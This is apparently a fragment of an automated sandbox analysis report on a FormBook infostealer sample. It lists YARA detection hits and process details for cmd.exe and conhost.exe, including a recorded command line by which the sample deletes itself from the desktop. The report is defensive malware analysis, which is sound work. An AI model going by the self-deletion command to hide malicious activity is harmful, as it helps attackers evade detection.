                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914660344.0000000003210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.914609737.0000000003110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:moderate

                                      Analysis Process: cmd.exe PID: 5052 Parent PID: 2628

                                      General

                                      Start time:12:27:02
                                      Start date:08/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:/c del 'C:\Users\user\Desktop\Y4U48592345670954.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Analysis Process: conhost.exe PID: 5692 Parent PID: 5052

                                      General

                                      Start time:12:27:02
                                      Start date:08/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Disassembly

                                      Code Analysis

                                      Reset < >